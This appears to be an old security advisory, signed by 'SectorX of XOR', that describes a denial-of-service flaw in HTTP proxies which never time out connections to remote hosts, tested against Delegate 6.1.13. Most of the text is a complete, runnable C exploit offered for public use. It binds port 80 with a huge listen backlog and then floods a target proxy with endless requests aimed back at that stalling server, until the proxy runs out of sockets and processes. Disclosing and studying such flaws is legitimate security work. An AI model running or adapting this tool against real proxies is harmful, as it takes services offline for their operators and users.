Many HTTP proxies are vulnerable to a denial of service attack because they do not timeout connections to a remote host, causing the proxy to run out of available sockets and start refusing connections. Tested against Delegate 6.1.13. Exploit code included.
a9552173fc6e379e7810ac0699fb84188c3ccbf628f94952e2b66c5ae4c71603
HTTP Proxies Denial of Service
by SectorX of XOR (http://xorteam.cjb.net)
The theory
==========
While browsing through my own http proxy code, i noticed an interesting
coding mistake - the proxy did not perfrom timeout checking on the remote host
the user was connecting to. since every time a user requests a file the proxy
spawns him a process, i figured this could be used for a nice fork() attack,
or make the proxy run out of available sockets.
I tested it against delegate 6.1.13, it created some system lag and then
ran out of free sockets, and couldnt accept anymore connections.
I _assume_ this makes alot of http proxies vulnerable, since this seems
like a common mistake.
Exploit
=======
This code acts as a webserver and a proxy client. it binds port 80 and sets
listen() to keep ALOT of connections holding, then connects to the target
proxy and starts spawning connections to its fake httpd, thus creating alot of
stalled child processes.
this was coded in a rush so dont mind its uglyness =p
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>
int Connect(int ip, int port)
{
int fd;
struct sockaddr_in tgt;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
memset(&tgt,0,sizeof(struct sockaddr_in));
tgt.sin_port = htons(port);
tgt.sin_family = AF_INET;
tgt.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;
return fd;
}
int sprint(int fd, const char *str,...)
{
va_list args;
char buf[4096];
memset(&buf,0,sizeof(buf));
va_start(args,str);
vsnprintf(buf,sizeof(buf),str,args);
return(write(fd,buf,strlen(buf)));
}
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in box;
fprintf(stderr, "Many http proxies denial of service (c) sectorx of xor [public]\n");
if (argc < 3) {
fprintf(stderr, "usage: %s <your ip> <proxy ip> [proxy port]\n",argv[0]);
return;
}
fprintf(stderr,"Making a stall on port 80 ... ");
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) {
perror("socket() ");
return;
}
memset(&box,0,sizeof(struct sockaddr_in));
box.sin_family = AF_INET;
box.sin_addr.s_addr = INADDR_ANY;
box.sin_port = htons(0x50);
if (bind(fd,(struct sockaddr*)&box,sizeof(struct sockaddr))<0) {
perror("bind()[80] ");
return;
}
if (listen(fd,65535)<0) {
perror("listen() ");
return;
}
fprintf(stderr,"done!\n");
fprintf(stderr,"Attacking proxy : ");
for (;;) {
int sock;
sock = Connect(inet_addr(argv[2]),(argc>3)?(atoi(argv[3])):3128);
if (sock<0) {
perror("Connect() ");
sleep(15);
continue;
}
sprint(sock,"GET http://%s/ HTTP/1.0\n\n",argv[1]);
fprintf(stderr, ".");
}
}